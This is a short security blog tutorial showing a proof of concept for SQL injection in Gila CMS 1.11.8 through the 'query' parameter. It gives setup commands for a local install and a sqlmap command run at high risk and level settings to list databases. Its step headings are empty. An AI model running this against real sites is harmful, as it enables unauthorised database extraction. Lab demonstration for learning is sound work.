Hey folks, today we will show you (PoC) of “Gila CMS 1.11.8 – ‘query’ SQL Injection” vulnerability. The get parameter “query” is vulnerable, hence we will use the SQL injection tool 💉 to retrieve the database.
wget https://github.com/GilaCMS/gila/archive/1.11.8.zip
unzip gila-1.11.8.zip
mkdir gila /var/www/html/
cp -R gila-1.11.8/* /var/www/html/gila/
cp gila-1.11.8/.htaccess /var/www/html/gila/
chown -R www-data:www-data gila/
Step -1
Step -2
Usage 🙂 < sqlmap > -r <burpsuite capture file > –dbs –level=5 –risk=3
Step -3
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.
Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…
Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…
Hey Folks, we are back today after such a long break, but don't worry we…
The security of your API should be one of the top priorities of companies. Without…
Hey Folks, In today's business world, it is essential to have an online presence. However,…
Hey Folks, Is your business prepared in case of a cyber attack? Many companies don't…
This website uses cookies.
View Comments
Secnhack blogs are helping me alot to learn Pentesting and bug hunting. Hope it will continue in the future with good contents and simply explained articles.